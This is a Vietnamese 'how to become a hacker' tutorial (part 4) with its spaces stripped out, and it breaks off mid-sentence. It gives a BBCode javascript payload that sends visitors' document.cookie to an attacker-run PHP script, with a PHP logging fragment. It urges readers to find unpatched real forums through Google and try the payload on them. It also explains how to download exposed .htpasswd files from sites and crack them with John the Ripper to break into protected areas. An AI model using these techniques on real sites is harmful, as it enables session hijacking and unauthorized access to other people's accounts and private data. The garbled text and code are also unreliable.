Những hiểu biết cơ bản nhất để trở thành Hacker - phần 4

NhữnghiểubiếtcơbảnnhấtđểtrởthànhHackertrangnàyđãđượcđọc lần21.)Kỹthuậtlấycắpcookiecủanạnnhân...
Nội dung trích xuất từ tài liệu:
Những hiểu biết cơ bản nhất để trở thành Hacker - phần 4NhữnghiểubiếtcơbảnnhấtđểtrởthànhHackertrangnàyđãđượcđọc lần21.)Kỹthuậtlấycắpcookiecủanạnnhân:_Trướchết,cácbạnhãymởnotepadrồichépđoạnmãsauvàonotepadđó:CODE$fp=fopen($file,$mode);fseek($fp,0,SEEK_END);fwrite($fp,$myData);fclose($fp);?>hoặcCODECODE[img]javascript:Document.write()[/img]hoặc:[CODEimg]javascript:Document.write(<imgsrc=http://host_php/docs.php?docs=+escape(document.cookie)+>)[/img]_BạncóthểtìmnhữngtrangwebđểthựchànhthửcáchtrongVDnàybằngcáchvàogoogle.comtìmnhữngforumbịlỗinàybằngtừkhoáPoweredby……..forum”vớinhữngforumsau:ikonboard,UltimateBulletinBoard,vBulletinBoard,Snitz.N ếucácbạnmaymắncácbạncóthểtìmthấynhữngforumchưafixlỗinàymàthựchành,aitìmđượcthìchiasẽvớimọingườinhé._Cònnhiềuđoạnmãăncắpcookiecũnghaylắm,cácbạnhãytựmìnhtìmthêm.22.)CáchngắtmậtkhẩubảovệWebsite:_KhicácbạntớitìmkiếmthôngtintrênmộttrangWebnàođó,cómộtsốchỗtrêntrangWebđókhibạnvàosẽbịchặnlạivàsẽxuấthiệnmộtboxyêucầunhậpmậtkhẩu,đâychínhlàkhuvựcriêngtưcấtdấunhữngthôngtinmậtchỉdànhchosốngườihoặcmộtnhómngườinàođó(Nơicấtđồnghềhackcủaviethacker.netmàbáoechipđãnóitớichẳnghạn).Khitaclickvàocáilinkđóthì(thôngthường)nósẽgọitới.htpasswdvà.htaccessnằmởcùngtrongthưmụcbảovệtrangWeb.Tạisaophảidùngdấuchấmởtrướctrongtênfile.htaccess?Cácfilecótênbắtđầulàmộtdấuchấm.sẽđượccácwebserversxemnhưlàcácfilecấuhình.Cácfilenàysẽbịẩnđi(hidden)khibạnxemquathưmụcđãđượcbảovệbằngfile.htaccess.Haihồsơnàycónhiệmvụđiềukhiểnsựtruynhậptớicáilinkantoànmàbạnmuốnxâmnhậpđó.Mộtcáiquảnlýmậtkhẩuvàusername,mộtcáiquảnlýcôngviệcmãhoánhữngthôngtinchofilekia.Khibạnnhậpđúngcả2thìcáilinkđómớimởra.BạnhãynhìnVDsau:CODEGraham:F#.DG*m38d%RFWebmaster:GJA54j.3g9#$@fUsernamebạncóthểđọcđượcrùi,còncáipassbạnnhìncóhiểumôtêgìkhông?Dĩnhiênlàkhôngrồi.bạncóhiểuvìsaokhôngmàbạnkhôngthểđọcđượcchúngkhông?cáinàynócósựcanthiệpcủathằngfile.htaccess.Dokhicùngởtrongcùngthưmụcchúngcótácđộngqualạiđểbảovệlẫnnhaunênchúngtacũngkhôngdạigìmàcốgắngđộtnhậprồicrackmớmậtkhẩuchếttiệtđó(khichưacóđồnghềcrackmậtkhẩutrongtay.Tôicũngđangnghiêncứuđểcóthểxâmnhậptrựctiếp,nếuthànhcôngtôisẽpostlênchocácbạn).Lỗilàởđây,chuyệngìsẽxảyranếucái.htpasswdnằmngoàithưmụcbảovệcófile.htaccess?Tasẽchômđượcnódễdàng,bạnhãyxemlinkVDsau:http://www.company.com/cgibin/protected/hãykiểmtraxemfile.htpasswdcóđượcbảovệbởI.htaccesshaykhông,tanhậpURLsau:http://www.company.com/cgibin/protected/.htpasswdNếubạnthấycócâutrảlờIFilenotfoundhoặctươngtựthìchắcchắnfilenàyđãkhôngđượcbảovệ,bạnhãytìmranóbằngmộttrongcácURLsau:http://www.company.com/.htpasswdhttp://www.company.com/cgibin/.htpasswdhttp://www.company.com/cgibin/passwords/.htpasswdhttp://www.company.com/cgibin/passwd/.htpasswdnếuvẫnkhôngthấythìcácbạnhãycốtìmbằngcácURLkháctươngtự(cóthểnónằmngayởthưmụcgốcđấy),chođếnkhinàocácbạntìmthấythìthôinhé.Khitìmthấyfilenàyrồi,bạnhãydùngchươngtrìnhJohntheripperhoặcCrackerjack,đểcrackpasswdcấttrongđó.CôngviệctiếptheohẳncácbạnđãbiếtlàmìnhphảilàmgìrồI,lấyusernamevàpasswdhợplệđộtnhậpvàorùixemthửmấycôcậu“tâmsự”nhữnggìtrongđó,nhưngcácbạncũngđừngcóđổipasscủahọhayquậyhọnhé.Cáchnàycácbạncũngcóthểápdụngđểlấypasscủaadminvìhầuhếtnhữngthànhviêntrongnhómkínđềulà“cóchứccóquyền”cả.23.)TìmhiểuvềCGI?_CGIlàtừviếttắtcủaCommonGatewayInterface,đasốcácWebsiteđềuđangsửdụngchươngtrìnhCGI(đượcgọIlàCGIscript)đểthựchiệnnhữngcôngviệccầnthiết24giờhằngngày.NhữngnguyênbảnCGIscriptthựcchấtlànhữngchươngtrìnhđượcviếtvàđượcuploadlêntrangWebvớInhữngngônngữchủyếulàPerl,C,C++,VbscripttrongđóPerlđượcưachuộngnhấtvìsựdễdàngtrongviệcviếtchươngtrình,chiếmmộtdunglượngítvànhấtlànócóthểchạyliêntụctrong24giờtrongngày._Thôngthường,CGIscriptđượccấttrongthưmục/cgibin/trêntrangWebnhưVDsau:http://www.company.com/cgibin/login.cgivớinhữngcôngviệccụthểnhư:+Tạorachươngtrìnhđếmsốngườiđãghéthăm.+ChophépnhữngngườIkháchlàmnhữnggìvàkhôngthểlàmnhữnggìtrênWebsitecủabạn.+Quảnlýusernamevàpasswdcủathànhviên.+CungcấpdịchvụMail.+Cungcấpnhữngtrangliênkếtvàthựchiệntinnhắ ...